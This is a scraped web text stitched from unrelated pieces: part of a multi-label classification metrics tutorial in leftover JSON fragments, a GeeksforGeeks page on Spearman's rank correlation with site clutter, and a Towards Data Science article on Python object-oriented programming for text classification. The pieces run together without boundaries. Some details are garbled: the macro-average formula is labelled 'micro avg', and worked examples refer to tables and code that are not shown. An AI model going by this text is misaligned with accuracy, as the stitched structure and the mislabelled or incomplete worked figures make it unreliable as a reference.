}, { "code": null, "e": 5452, "s": 5349, "text": "The above list of expected and predicted labels is just to visually understand how they are different." }, { "code": null, "e": 5571, "s": 5452, "text": "train, test <- datatransformed_train <- fit + transformtransformed_test <- transform (using the same scaler/binarizer)" }, { "code": null, "e": 5634, "s": 5571, "text": "Let’s find the confusion matrix for class A based on our test." }, { "code": null, "e": 5772, "s": 5634, "text": "For calculating true positive, we’re looking at the cases where our model predicted the label A and the expected labels also contained A." }, { "code": null, "e": 5799, "s": 5772, "text": "So TP would be equal to 1." }, { "code": null, "e": 5913, "s": 5799, "text": "Coming to FP, we are looking for those cases where our model predicted the label A but A isn’t in the true label." }, { "code": null, "e": 5925, "s": 5913, "text": "So FP is 0." }, { "code": null, "e": 6023, "s": 5925, "text": "Coming to TN, this is where neither the expected labels nor the predicted labels contain class A." }, { "code": null, "e": 6035, "s": 6023, "text": "So TN is 1." }, { "code": null, "e": 6122, "s": 6035, "text": "Finally, FN is where the A is an expected label, but it wasn’t predicted by our model." }, { "code": null, "e": 6134, "s": 6122, "text": "So FN is 1." }, { "code": null, "e": 6198, "s": 6134, "text": "Let’s make the confusion matrix for class A using these values:" }, { "code": null, "e": 6213, "s": 6198, "text": "TN FPFN TP" }, { "code": null, "e": 6221, "s": 6213, "text": "We get:" }, { "code": null, "e": 6282, "s": 6221, "text": "A similar computation can be done for the other two classes." }, { "code": null, "e": 6340, "s": 6282, "text": "Class B: 1 1 0 1Class C: 0 0 1 2" }, { "code": null, "e": 6613, "s": 6340, "text": "Confusion matrices like the ones we just calculated can be generated using sklearn’s multilabel_confusion_matrix. We simply pass in the expected and predicted labels (after binarizing them)and get the first element from the list of confusion matrices — one for each class." }, { "code": null, "e": 6688, "s": 6613, "text": "confusion_matrix_A = multilabel_confusion_matrix(y_expected, y_pred)[0]" }, { "code": null, "e": 6736, "s": 6688, "text": "The output is consistent with our calculations." }, { "code": null, "e": 6779, "s": 6736, "text": "print(confusion_matrix_A)# prints:1 01 1" }, { "code": null, "e": 6881, "s": 6779, "text": "Using the confusion matrices we just computed, let’s calculate each metric for class A as an example." }, { "code": null, "e": 6903, "s": 6881, "text": "Precision for class A" }, { "code": null, "e": 6924, "s": 6903, "text": "Precision is simply:" }, { "code": null, "e": 6951, "s": 6924, "text": "Precision = TP / (TP + FP)" }, { "code": null, "e": 6995, "s": 6951, "text": "In the case of class A, that ends up being:" }, { "code": null, "e": 7011, "s": 6995, "text": "1 / (1 + 0) = 1" }, { "code": null, "e": 7030, "s": 7011, "text": "Recall for class A" }, { "code": null, "e": 7069, "s": 7030, "text": "Using the formula for recall given as:" }, { "code": null, "e": 7093, "s": 7069, "text": "Recall = TP / (TP + FN)" }, { "code": null, "e": 7101, "s": 7093, "text": "we get:" }, { "code": null, "e": 7119, "s": 7101, "text": "1 / (1 + 1) = 0.5" }, { "code": null, "e": 7140, "s": 7119, "text": "F1-score for class A" }, { "code": null, "e": 7214, "s": 7140, "text": "This is just the harmonic mean of the precision and recall we calculated." 
}, { "code": null, "e": 7230, "s": 7214, "text": "which gives us:" }, { "code": null, "e": 7299, "s": 7230, "text": "These metrics can be calculated for classes B and C in the same way." }, { "code": null, "e": 7380, "s": 7299, "text": "On finishing it for all the other classes, we end up with the following results:" }, { "code": null, "e": 7388, "s": 7380, "text": "Class B" }, { "code": null, "e": 7432, "s": 7388, "text": "Precision = 0.5Recall = 1.0F1-score = 0.667" }, { "code": null, "e": 7440, "s": 7432, "text": "Class C" }, { "code": null, "e": 7484, "s": 7440, "text": "Precision = 1.0Recall = 0.667F1-score = 0.8" }, { "code": null, "e": 7604, "s": 7484, "text": "Aggregate metrics like macro, micro, weighted and sampled avg give us a high-level view of how our model is performing." }, { "code": null, "e": 7618, "s": 7604, "text": "Macro average" }, { "code": null, "e": 7709, "s": 7618, "text": "This is simply the average of a metric — precision, recall or f1-score — over all classes." }, { "code": null, "e": 7766, "s": 7709, "text": "So in our case, the macro-average for precision would be" }, { "code": null, "e": 7851, "s": 7766, "text": "Precision (micro avg)= (Precision of A + Precision of B + Precision of C) / 3= 0.833" }, { "code": null, "e": 7865, "s": 7851, "text": "Micro average" }, { "code": null, "e": 8040, "s": 7865, "text": "The micro-average of a metric is calculated by considering all the TP, TN, FP and FN for each class, adding them up and then using those to compute the metric’s micro-average" }, { "code": null, "e": 8079, "s": 8040, "text": "For example, micro-precision would be:" }, { "code": null, "e": 8133, "s": 8079, "text": "micro avg (precision) = sum(Tp) / (sum(TP) + sum(FP))" }, { "code": null, "e": 8169, "s": 8133, "text": "For our example, we end up getting:" }, { "code": null, "e": 8186, "s": 8169, "text": "Weighted average" }, { "code": null, "e": 8296, "s": 8186, "text": "This is simply the average of the metric values for individual classes weighted by the support of that class." }, { "code": null, "e": 8312, "s": 8296, "text": "Samples average" }, { "code": null, "e": 8415, "s": 8312, "text": "Here, we compute metrics for each sample and then average them. In our example, we have three samples." }, { "code": null, "e": 8481, "s": 8415, "text": "expected predictedA, C A, BC CA, B, C B, C" }, { "code": null, "e": 8558, "s": 8481, "text": "For sample #1, A and B were predicted, but the expected classes were A and C" }, { "code": null, "e": 8668, "s": 8558, "text": "So the precision for this sample would be 1 / 2, since out of the two predicted labels, only one was correct." }, { "code": null, "e": 8720, "s": 8668, "text": "For sample #2, C was predicted, and C was expected." }, { "code": null, "e": 8798, "s": 8720, "text": "So precision would be 1 for this sample — all predicted labels were expected." }, { "code": null, "e": 8873, "s": 8798, "text": "For sample #3, B and C were predicted, but all three labels were expected." }, { "code": null, "e": 9033, "s": 8873, "text": "Since all predicted labels were expected, precision would be 1. Note that though A wasn’t predicted, the missing label won’t hurt precision, it’ll hurt recall." }, { "code": null, "e": 9091, "s": 9033, "text": "Averaging this, we get our samples average for precision." }, { "code": null, "e": 9123, "s": 9091, "text": "(1/2 + 1 + 1) / 3 = 5/6 = 0.833" }, { "code": null, "e": 9189, "s": 9123, "text": "These aggregates can be computed for recall and f1-score as well." 
}, { "code": null, "e": 9371, "s": 9189, "text": "Putting all this together, we end up with our classification report. Our computed values match those generated by sklearn. We’ll use sklearn’s metrics.classifiction_report function." }, { "code": null, "e": 9493, "s": 9371, "text": "classification_report( y_expected, y_pred, output_dict=False, target_names=['class A', 'class B', 'class C'])" }, { "code": null, "e": 9584, "s": 9493, "text": "These are some scenarios that are likely to occur when evaluating multi-label classifiers." }, { "code": null, "e": 9914, "s": 9584, "text": "Real-world test data can have duplicates. If you don’t remove them, how would they affect the performance of your model? The aggregate metrics generally used when evaluating classification models are forms of average. So the effect of duplicates comes down to whether these duplicated data points are correctly classified or not." }, { "code": null, "e": 10073, "s": 9914, "text": "When your model doesn’t predict every expected label but also doesn’t predict extra labels, you’ll see higher precision values along with lower recall values." }, { "code": null, "e": 10205, "s": 10073, "text": "Whatever your model predicts, it's doing it correctly (high precision) but it's not always predicting what’s expected (low recall)." }, { "code": null, "e": 10507, "s": 10205, "text": "This is the opposite of the previous scenario. Since your model is predicting extra labels, those extra classes would end up with lower precision (since those predictions aren’t expected). At the same time, your model is predicting all the expected labels too, so you’d end up with high recall scores." }, { "code": null, "e": 10763, "s": 10507, "text": "This is the ideal scenario, where both precision and recall are high. Intuitively, this means that when our model predicts a particular label, that’s most often an expected label, and when a particular label is expected, our model generally gets it right." }, { "code": null, "e": 11127, "s": 10763, "text": "This means that our model is really selective in its predictions. When a data point is particularly difficult to label, our model chooses to not take the risk of predicting an incorrect label. This means that when our model predicts a particular label, it is more often than not correct (high precision), but the same isn’t true the other way around (low recall)." }, { "code": null, "e": 11399, "s": 11127, "text": "In this case, our model is pretty lenient in its predictions. It is more likely to assign a label to a data point even if it’s not completely sure. And because of this, our model is likely to assign incorrect labels to certain data points, leading to a drop in precision." }, { "code": null, "e": 11600, "s": 11399, "text": "Most algorithms use a threshold of 0.5. This means that predictions with confidence greater than 0.5 are considered to belong to the positive class, while less confident predictions aren’t considered." }, { "code": null, "e": 11732, "s": 11600, "text": "How does this relate to the entire precision-recall discussion? Well, think about what would happen if you modified this threshold." }, { "code": null, "e": 12084, "s": 11732, "text": "If you increase your threshold, you’re getting more stringent about what your model predicts. Now that only predictions with high confidence are assigned, your model is more likely to be right when it predicts a class, leading to high precision. 
At the same time, your model may miss expected labels that had low confidence, leading to a lower recall." }, { "code": null, "e": 12520, "s": 12084, "text": "On the other hand, reducing your model’s classification threshold would mean that your model is lenient about its predictions. That would mean that your model is more likely to predict expected labels though they may have been low-confidence decisions, meaning that you’ll have a high recall. But now that your model is less strict, it’s likely that the labels it assigns aren’t part of the expected labels, leading to lower precision." }, { "code": null, "e": 12710, "s": 12520, "text": "As we just saw, there’s a tradeoff between precision and recall. If you make your model highly selective, you end up with better precision, but risk facing a drop in recall, and vice versa." }, { "code": null, "e": 12806, "s": 12710, "text": "Between these two metrics, what’s more important depends on the problem you’re trying to solve." }, { "code": null, "e": 13035, "s": 12806, "text": "Medical diagnostic tools, like skin cancer detection systems, can’t afford to label a cancerous case as a non-cancerous one. Here, you would want to minimize the false negatives. This means that you’re trying to maximize recall." }, { "code": null, "e": 13430, "s": 13035, "text": "Likewise, if you consider a recommendation system, you’re more concerned with recommending something that customers may not be interested in than with not recommending something they would be interested in. Here, fall negatives aren’t an issue — the goal is to make the content as relevant as possible. Since we’re reducing false positives here, we’re focusing on precision, rather than recall." }, { "code": null, "e": 13592, "s": 13430, "text": "A good way to remember the difference between what precision and recall represent is explained in this answer by Jennifer on the data science StackExchange site:" }, { "code": null, "e": 13622, "s": 13592, "text": "datascience.stackexchange.com" }, { "code": null, "e": 14000, "s": 13622, "text": "Definitely. Different kinds of problems have different metrics that work best for that particular case. Even for the case we just discussed — multi-label classification — there’s another metric called a Hamming Score, which evaluates how close your model’s predictions are to what’s expected. You can think of it as a more forgiving kind of accuracy for multilabel classifiers." }, { "code": null, "e": 14091, "s": 14000, "text": "A good starting point would be this excellent TowardsDataScience article by Rahul Agarwal." }, { "code": null, "e": 14114, "s": 14091, "text": "towardsdatascience.com" }, { "code": null, "e": 14163, "s": 14114, "text": "All code used in this article is available here:" }, { "code": null, "e": 14174, "s": 14163, "text": "github.com" }, { "code": null, "e": 14350, "s": 14174, "text": "Evaluating your model using the right metrics is imperative. Realizing halfway through your experiments that you were measuring the wrong thing is not a fun position to be in." }, { "code": null, "e": 14513, "s": 14350, "text": "You can avoid this by finding out which metrics are the most relevant to your use case, and then actually understanding how these are computed and what they mean." }, { "code": null, "e": 14620, "s": 14513, "text": "Hopefully, this article gave you an idea of how multi-label classifiers are evaluated. Thanks for reading!" 
}, { "code": null, "e": 14629, "s": 14620, "text": "22/21/12" }, { "code": null, "e": 14659, "s": 14629, "text": "fixed issue in recall formula" }, { "code": null, "e": 14667, "s": 14659, "text": "2/11/21" }, { "code": null, "e": 14688, "s": 14667, "text": "wording improvements" }, { "code": null, "e": 14705, "s": 14688, "text": "add example code" }, { "code": null, "e": 14713, "s": 14705, "text": "15/4/22" } ]
Spearman's Rank Correlation - GeeksforGeeks
18 Aug, 2020

What is a correlation test? The strength of the association between two variables is known as the correlation test. For instance, if we are interested to know whether there is a relationship between the heights of fathers and sons, a correlation coefficient can be calculated to answer this question. To know more about correlation, please refer to this.

Methods for correlation analysis: There are mainly two types of correlation:

Parametric Correlation – Pearson correlation (r): It measures a linear dependence between two variables (x and y) and is known as a parametric correlation test because it depends on the distribution of the data.
Non-Parametric Correlation – Kendall (tau) and Spearman (rho): They are rank-based correlation coefficients and are known as non-parametric correlation.

Spearman Correlation formula:

rs = 1 - (6 * sum(di^2)) / (n * (n^2 - 1))

where,
rs = Spearman Correlation coefficient
di = the difference in the ranks given to the two variables values for each item of the data,
n = total number of observations

Example: In Spearman's rank correlation, what we do is convert the data, even if it is real-valued, to what we call ranks. Let's consider taking 10 different data points in variables X1 and Y1, find out their respective ranks, and then find out the square of the difference in the ranks given to the two variables values for each item of the data.

Step 1: Finding Rank –

Rank X1: So, what we have done is looked at all the individual values of X1 and assigned a rank to each. For example, the lowest value, in this case, is 2 and it is given a rank 1; the next highest value is 3, which is given a rank 2, and so on. So, we have ranked all of these points. Notice that the sixth and the first value are tied, so they both get the rank of 6.5 (the midway value) because there is a tie. Similarly, if there are more than 2 values that are tied, we take all these ranks, average them over the number of data points that have equal values, and correspondingly assign the rank.

Rank Y1: Similarly, you can give ranks to the Y1 data points in the same manner.

Step 2: Calculate d2 – Once you have got the ranks, you compute the difference in the ranks. So, in this case, the difference in the rank for the first data point is 2 and we square it; similarly, we take the difference in the ranks between Xi and Yi for the second data point, which is 2, square it and get 4. So, like this, we take the differences in the ranks, and by squaring them we get the final what we call the d squared values. We sum over all values and then compute the Spearman coefficient by using this value in the above formula. By putting in the value of the overall sum of d2 and the value of n:

rho/rs = 1 - ((6 x 20.5) / 990) = 1 - (123 / 990) = 1 - 0.1242 = 0.88

Properties:

rs takes a value between -1 (negative association) and 1 (positive association).
rs = 0 means no association.
It can be used when the association is non-linear.
It can be applied to ordinal variables.

Spearman Correlation for Anscombe's Data: Anscombe's data, also known as Anscombe's quartet, comprises four datasets that have nearly identical simple statistical properties, yet appear very different when graphed. Each dataset consists of eleven (x, y) points. They were constructed in 1973 by the statistician Francis Anscombe to demonstrate both the importance of graphing data before analyzing it and the effect of outliers on statistical properties. Those 4 sets of 11 data-points are given here. Please download the csv file here. When we plot those points it looks like this.
I am considering 3 sets of 11 data-points here.

A brief explanation of the above diagram: If we apply the Spearman correlation coefficient to each of these data sets, we find that it is nearly identical; it does not matter whether you apply it to the first data set (top left), the second data set (top right) or the third data set (bottom left) - in each case we find a reasonably high correlation coefficient, close to one. The key point here is that we cannot immediately conclude that a high Spearman correlation coefficient implies a linear relationship between the variables; for example, the second data set (top right) shows a non-linear relationship and still gives rise to a reasonably high value.
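The two steps described above can be reproduced in a few lines of Python. The sketch below computes Spearman's rho by hand (average ranks for ties, squared rank differences, then the formula) and cross-checks the result against scipy.stats.spearmanr. Note that the X1/Y1 values used here are illustrative stand-ins, not the exact table from the example above.

import numpy as np
from scipy.stats import rankdata, spearmanr

# Illustrative data (10 paired observations), not the article's exact table
x1 = np.array([7, 6, 4, 5, 8, 7, 10, 3, 9, 2])
y1 = np.array([5, 4, 6, 7, 10, 8, 9, 2, 11, 1])

# Step 1: rank each variable; tied values share the average of their ranks
rank_x = rankdata(x1, method='average')
rank_y = rankdata(y1, method='average')

# Step 2: squared rank differences, then the Spearman formula
d_squared = (rank_x - rank_y) ** 2
n = len(x1)
rho_manual = 1 - (6 * d_squared.sum()) / (n * (n ** 2 - 1))

# Cross-check with SciPy (when ties are present, SciPy's Pearson-on-ranks
# value can differ very slightly from the shortcut formula)
rho_scipy, p_value = spearmanr(x1, y1)

print("sum of d^2:", d_squared.sum())
print("manual rho:", round(rho_manual, 4))
print("scipy  rho:", round(rho_scipy, 4), "p-value:", round(p_value, 4))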
[ { "code": null, "e": 24581, "s": 24553, "text": "\n18 Aug, 2020" }, { "code": null, "e": 24879, "s": 24581, "text": "What is correlation test?The strength of the association between two variables is known as the correlation test. For instance, if we are interested to know whether there is a relationship between the heights of fathers and sons, a correlation coefficient can be calculated to answer this question." }, { "code": null, "e": 24930, "s": 24879, "text": "For know more about correlation please refer this." }, { "code": null, "e": 25006, "s": 24930, "text": "Methods for correlation analysis:There are mainly two types of correlation:" }, { "code": null, "e": 25214, "s": 25006, "text": "Parametric Correlation – Pearson correlation(r) : It measures a linear dependence between two variables (x and y) is known as a parametric correlation test because it depends on the distribution of the data." }, { "code": null, "e": 25362, "s": 25214, "text": "Non-Parametric Correlation – Kendall(tau) and Spearman(rho): They are rank-based correlation coefficients, are known as non-parametric correlation." }, { "code": null, "e": 25392, "s": 25362, "text": "Spearman Correlation formula:" }, { "code": null, "e": 25560, "s": 25392, "text": "where,rs = Spearman Correlation coefficientdi = the difference in the ranks given to the two variables values for each item of the data,n = total number of observation" }, { "code": null, "e": 25912, "s": 25560, "text": "Example: In the Spearman’s rank correlation what we do is convert the data even if it is real value data to what we call ranks. Let’s consider taking 10 different data points in variable X1 and Y1. And find out their respective ranks. Then find out the square of the difference in the ranks given to the two variables values for each item of the data." }, { "code": null, "e": 25934, "s": 25912, "text": "Step 1: Finding Rank-" }, { "code": null, "e": 26548, "s": 25934, "text": "Rank X1: So, what we have done is looked at all the individual values of X1 and assigned a rank to it. For example, the lowest value, in this case, is 2 and it is given a rank 1 the next highest value is 3 that is given a rank 2 and so on. So, we are ranked all of these points. Notice that the sixth and the first value both are tied. So, they get the rank of 6.5(the midway the half of it) because there is a tie. Similarly, if there are more than 2 values that are tied we take all these ranks and average them by the number of data points that have equal values, and correspondingly you have to give the rank." }, { "code": null, "e": 26624, "s": 26548, "text": "Rank Y1: Similarly, you can give rank to Y1 data points in the same manner." }, { "code": null, "e": 27166, "s": 26624, "text": "Step 2: Calculate d2–Once you have got the rank you compute the difference in the ranks. So, in this case, the difference in the rank for the first data point is 2 and we square it, similarly, we take the difference in the second data point in the ranks between Xi and Yi which is 2 and square it and we get 4. So, like this, we make the difference in the ranks and by squaring it we get the final what we call the d squared values. We sum overall values and then we compute the Spearman coefficient by using this value in the above formula." 
}, { "code": null, "e": 27308, "s": 27166, "text": "By putting the value of the overall sum of d2 and n value\n\nrho/rs = 1 - ((6 x 20.5) / 990)\n = 1 - (123 / 990)\n = 1 - 0.1242\n = 0.88\n" }, { "code": null, "e": 27320, "s": 27308, "text": "Properties:" }, { "code": null, "e": 27399, "s": 27320, "text": "rs takes a value between -1(negative association) and 1(positive association)." }, { "code": null, "e": 27428, "s": 27399, "text": "rs = 0 means no association." }, { "code": null, "e": 27475, "s": 27428, "text": "It can be used when association is non linear." }, { "code": null, "e": 27516, "s": 27475, "text": "It can be applied for ordinal variables." }, { "code": null, "e": 27971, "s": 27516, "text": "Spearman Correlation for Anscombe’s Data:Anscombe’s data also known as Anscombe’s quartet comprises of four datasets that have nearly identical simple statistical properties, yet appear very different when graphed. Each dataset consists of eleven (x, y) points. They were constructed in 1973 by the statistician Francis Anscombe to demonstrate both the importance of graphing data before analyzing it and the effect of outliers on statistical properties." }, { "code": null, "e": 28146, "s": 27971, "text": "Those 4 sets of 11 data-points are given here. Please download the csv file here.When we plot those points it looks like this. I am considering 3 sets of 11 data-points here." }, { "code": null, "e": 28927, "s": 28146, "text": "A brief explanation of the above diagram:So, if we apply Spearman correlation coefficient for each of these data sets we find that it is nearly identical, it does not matter whether you actually apply into a first data set (top left) or second data set (top right) or the third data set (bottom left). So, what it seems to indicate is that if we apply the Spearman correlation and we find the reasonably high correlation coefficient close to one in this first data set(top left) case. The key point is here we can’t conclude immediately that if the Spearman correlation coefficient is going to be high then there is a linear relationship between them, for example in the second data set(top right) this is a non-linear relationship and still gives rise to a reasonably high value." }, { "code": null, "e": 28940, "s": 28927, "text": "data-science" }, { "code": null, "e": 28963, "s": 28940, "text": "statistical-algorithms" }, { "code": null, "e": 28980, "s": 28963, "text": "Machine Learning" }, { "code": null, "e": 28997, "s": 28980, "text": "Machine Learning" }, { "code": null, "e": 29095, "s": 28997, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." 
}, { "code": null, "e": 29104, "s": 29095, "text": "Comments" }, { "code": null, "e": 29117, "s": 29104, "text": "Old Comments" }, { "code": null, "e": 29140, "s": 29117, "text": "ML | Linear Regression" }, { "code": null, "e": 29154, "s": 29140, "text": "Decision Tree" }, { "code": null, "e": 29192, "s": 29154, "text": "Python | Decision tree implementation" }, { "code": null, "e": 29216, "s": 29192, "text": "Search Algorithms in AI" }, { "code": null, "e": 29272, "s": 29216, "text": "Difference between Informed and Uninformed Search in AI" }, { "code": null, "e": 29312, "s": 29272, "text": "Decision Tree Introduction with example" }, { "code": null, "e": 29358, "s": 29312, "text": "Elbow Method for optimal value of k in KMeans" }, { "code": null, "e": 29400, "s": 29358, "text": "Deploy Machine Learning Model using Flask" }, { "code": null, "e": 29423, "s": 29400, "text": "Reinforcement learning" } ]
Python: The (unofficial) OOP crash course for (aspiring) data scientists! | by Jake | Towards Data Science
Python is experiencing tremendous increases in its market demand and user base; whether you’re a developer, analyst, researcher or engineer, there’s a good chance that python is being used in your domain. The barrier to entry could not be lower with so many free educational materials (such as Automate the Boring Stuff). Oddly, however, we’re seeing an unusual consequence: Pythonistas are plateauing prematurely, terminating their study of python fundamentals in favor of domain-specific learning of libraries and frameworks. This is especially true for the present-day data science culture; after gaining intermediate familiarity with strings, lists, and dictionaries, prospective pythonistas jump directly into Numpy, Pandas, and Scikit-Learn (if not Keras, TensorFlow, or PyTorch).

So should you study data structures and algorithms (DS&A), implementing a binary tree or linked list from scratch? What is the appropriate “I’ve learned enough python fundamentals” threshold to start one’s domain-specific journey? There’s no “one size fits all” answer; however, I recommend familiarizing yourself with OOP at the very least before jumping into topics like regression, classification, and clustering.

To make sense of OOP, we need to briefly discuss functional programming; without diving deep into this paradigm, suffice to say, functional programming separates functions (actions) from data (information), whereas OOP views this as a false dichotomy. Have you used python’s built-in list before? (Yes) Surely you’ve noticed that the append method allowed you to insert an element after the current last element, automatically incrementing the list’s length? (Yes)

Congrats! You like OOP. The fact that the data type and its methods (functions attached to an object) are one cohesive whole is the core “essence” of OOP.

In the following code snippets, I’m going to define a class or two, and demonstrate some essential OOP concepts around an established machine learning task so that you can see how OOP can benefit the data scientist. We will be classifying Yelp reviews using any of a variety of ML algorithms. In fact, this class will receive only two mandatory arguments, the data and the model you wish to use. (You can, of course, swap in several other algorithms.) Whichever model you choose, this class architecture will allow us to do the following: (1) divide data into train and test sets, (2) preprocess and vectorize data into TF-IDF tokens, (3) train the model, (4) compute accuracy and related metrics on test set performance, and (5) save the model via pickle.

This pipeline will greatly increase your efficiency. I, like many others, jumped into data science material before having a solid handle on the fundamentals. I’d scroll up and down through notebooks looking for the right variables I had defined earlier. And if I wanted to compare the performance of 2 or 3 models, it would become a nightmare, making sure I referenced the appropriate variable names. You’ll see that with the following approach, comparing model performance will be a trivial task and (with any luck) I’ll have made an OOP evangelist out of you!

For display issues, see this GitHub Gist.

As you’ll note above, I’ve defined two classes: DataSplitter and Classifier. For starters, let’s just look at DataSplitter; we’ll visit Classifier shortly thereafter.

DataSplitter receives a dataframe, the name of the text column and the name of the sentiment column. Then train_test_split is used to assign the following class attributes: x_train, x_test, y_train, and y_test.
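The gist itself is not reproduced in this article, so the snippet below is a minimal sketch of what a DataSplitter along these lines could look like. The default values shown for random_state and test_percent are assumptions chosen to match the description, not the author's original code.

import pandas as pd
from sklearn.model_selection import train_test_split

class DataSplitter:
    """Minimal sketch: splits a dataframe into train/test attributes."""

    def __init__(self, data, x_var, y_var, random_state=42, test_percent=0.25):
        # Because random_state and test_percent have defaults, two instances
        # built from the same dataframe produce identical splits unless the
        # caller overrides them.
        self.data = data
        self.x_var = x_var
        self.y_var = y_var
        self.x_train, self.x_test, self.y_train, self.y_test = train_test_split(
            data[x_var],
            data[y_var],
            test_size=test_percent,
            random_state=random_state,
        )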
Note that the random_state and test_percent parameters have default values. What this means is that unless you specifically change either of these parameters, two class instances will have identical x_train, x_test, y_train, and y_test attributes. This will be useful as we can compare ML models directly without worry that they were trained on (slightly) different datasets.

When a DataSplitter class object is instantiated, you can access these values very simply:

import pandas as pd

data = pd.read_csv('yelp_samples_500k.csv')
d = data.sample(n=1000)
ds = DataSplitter(data=d, x_var='text', y_var='sentiment')
ds.x_test
>>>
267157    This place always has a line so I expected to ...
197388    Would give them a zero stars if I could. They ...

As you can see, the self keyword binds these attributes to the object. Using dot notation, it’s trivial to retrieve these attributes.

On to our next OOP concept: Inheritance! For this example we’ll move on to the second class, Classifier. Inheritance simply means one class inheriting functionality from a previously defined class. In our case, Classifier will inherit all the functionality of DataSplitter; note two things: (1) DataSplitter receives no class to inherit from in its definition DataSplitter(), whereas Classifier(DataSplitter) does receive a class to inherit from. (2) The super keyword is used in Classifier’s __init__ method. This has the effect of executing DataSplitter’s init method and then moving on to all other instructions specific to Classifier’s own init method. Bottom line, we train/test/split our data without retyping all that code over again!

After the init method, you’ll see __vectorize. Note the double underscores preceding the definition. This is how encapsulation is achieved in python. Encapsulation means, roughly, that the object has attributes and methods that are not available to the programmer. In other words, they’re abstracted away (or encapsulated) so as not to distract the programmer.

from sklearn.naive_bayes import MultinomialNB

nb = MultinomialNB()
c = Classifier(data=d, model_instance=nb, x_var='text', y_var='sentiment')
c.__vectorize('some text')
>>>
AttributeError: 'Classifier' object has no attribute '__vectorize'

In other words, the object has access to these methods; however, we do not!

Speaking of methods, if you hadn’t guessed, methods are simply functions built into a class object. The methods we’ve defined above include __vectorize, __fit, __evaluate_accuracy, metrics, predict, and save.

Starting with vectorize, we use NLTK’s word_tokenize function to tokenize all words and punctuation into unigrams. Next, we use NLTK’s ngrams function to create bigrams and trigrams:

'I like dogs'            # text
['I', 'like', 'dogs']    # unigrams
['I like', 'like dogs']  # bigrams
['I like dogs']          # trigram

This method improves upon unigrams greatly because it allows ML models to learn the difference between “good” and “not good,” for example. Note that I’ve not removed stopwords or punctuation and haven’t stemmed word tokens either. This might be a good homework assignment if you’re interested in expanding functionality! The __vectorize method is delivered to the pipeline attribute, which is created by the __fit method. Likewise, the __fit method trains the ML model supplied to the init method and creates predictions (preds). The following method, __evaluate_accuracy, determines the binary accuracy of the model and assigns it as a class attribute for ease of access later (no need to recompute it multiple times).

Next, our metrics method will either retrieve binary accuracy for us or print the classification report (precision, recall, etc.). Our predict method productionizes this code with simplicity. Supply text to the method call and either a class will be assigned or the probability of belonging to class 1 will be returned. (If you’re interested in multiclass classification, some adjustments will be necessary; I’ll leave that to you as a homework problem!) Lastly, the save method receives a file-path and pickles the entire object. This is neat: all we have to do is open the pickled file to access all class methods and attributes, including the fully trained model!

from sklearn.naive_bayes import MultinomialNB

nb = MultinomialNB()
nb_model = Classifier(data=data, model_instance=nb, x_var='text', y_var='sentiment')
nb_model.metrics()
>>>
'92.77733333333333 percent accurate'

Let’s compare this to the random forest classifier!

from sklearn.ensemble import RandomForestClassifier

rf = RandomForestClassifier()
rf_model = Classifier(data=data, model_instance=rf, x_var='text', y_var='sentiment')
rf_model.metrics()
>>>
'86.29666666666667 percent accurate'

It appears that our naive bayes model outperforms our random forest classifier. Saving our object (and opening it again for later use) is as easy as:

## saving
nb_model.save('nb_model')  # will append .pkl to end of input

## opening for later use
with open('nb_model.pkl', 'rb') as f:
    loaded_model = pickle.load(f)

loaded_model.predict("This tutorial was super awesome!", prob=True)
>>>
0.943261472480177  # 94% certain of positive sentiment

I hope you’ve enjoyed this tutorial; my goals were to be concise, informative, and practical. To meet all three objectives, some OOP topics didn’t make the cut (polymorphism, for example). Please comment if you found this helpful. Likewise, if you’d like me to explore similar concepts, post a comment and I’ll see if it’s something I can work into future articles.

Thank you for reading. If you think my content is alright, please subscribe! :)
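To tie the pieces above together, here is a rough skeleton of how a Classifier built on top of DataSplitter could be organized. This is a hedged reconstruction for orientation only: the original gist is not reproduced in this article, and the method bodies below are simplified stand-ins (for instance, the pipeline here uses scikit-learn's TfidfVectorizer rather than the NLTK tokenization described above).

import pickle
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics import accuracy_score, classification_report
from sklearn.pipeline import make_pipeline

class Classifier(DataSplitter):
    """Sketch only: trains, evaluates, and pickles a text classifier."""

    def __init__(self, data, model_instance, x_var, y_var, **kwargs):
        super().__init__(data, x_var, y_var, **kwargs)   # reuse the train/test split
        self.model_instance = model_instance
        self.__fit()
        self.__evaluate_accuracy()

    def __fit(self):
        # Name-mangled ("private") method: vectorize the text, then fit the model
        self.pipeline = make_pipeline(TfidfVectorizer(), self.model_instance)
        self.pipeline.fit(self.x_train, self.y_train)
        self.preds = self.pipeline.predict(self.x_test)

    def __evaluate_accuracy(self):
        self.accuracy = accuracy_score(self.y_test, self.preds)

    def metrics(self, report=False):
        if report:
            print(classification_report(self.y_test, self.preds))
        return f"{self.accuracy * 100} percent accurate"

    def predict(self, text, prob=False):
        if prob:
            # probability of class 1 (assumes the model supports predict_proba)
            return self.pipeline.predict_proba([text])[0][1]
        return self.pipeline.predict([text])[0]

    def save(self, path):
        with open(path + ".pkl", "wb") as f:
            pickle.dump(self, f)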
[ { "code": null, "e": 959, "s": 172, "text": "Python is experiencing tremendous increases in its market demand and user base; whether you’re a developer, analyst, researcher or engineer, there’s a good chance that python is being used in your domain. The barrier to entry could not be lower with so many free educational materials (such as Automate the Boring Stuff.) Oddly, however, we’re seeing an unusual consequence: Pythonistas are plateauing prematurely, terminating their study of python fundamentals in favor of domain specific learning of libraries and frameworks. This is especially true for the present day data science culture; after gaining intermediate familiarity with strings, lists, and dictionaries, prospective pythonistas jump directly into Numpy, Pandas, and Scikit-Learn (if not Keras, TensorFlow, or PyTorch.)" }, { "code": null, "e": 1376, "s": 959, "text": "So should you study data structures and algorithms (DS&A), implementing a binary tree or linked list from scratch? What is the appropriate “I’ve learned enough python fundamentals” threshold to start one’s domain-specific journey? There’s no “one size fits all” answer; however, I recommend familiarizing yourself with OOP at the very least before jumping into topics like regression, classification, and clustering." }, { "code": null, "e": 1841, "s": 1376, "text": "To make sense of OOP, we need to briefly discuss functional programming; without diving deep into this paradigm, suffice to say, functional programming separates functions (actions) from data (information), whereas OOP views this as a false dichotomy. Have you used python’s built in list before? (Yes) Surely you’ve noticed that the append method allowed you to insert an element after the current last element, automatically incrementing the list’s length? (Yes)" }, { "code": null, "e": 1997, "s": 1841, "text": "Congrats! You like OOP. The fact that the data type and its methods (functions attached to an object) are one cohesive whole, is the core “essence” of OOP." }, { "code": null, "e": 2508, "s": 1997, "text": "In the following code snippets, I’m going to define a class or two, and demonstrate some essential OOP concepts around an established machine learning task so that you can see how OOP can benefit the data scientist. We will be classifying Yelp reviews using any variety of ML algorithms. In fact, this class will receive only two mandatory arguments, the data and the model you wish 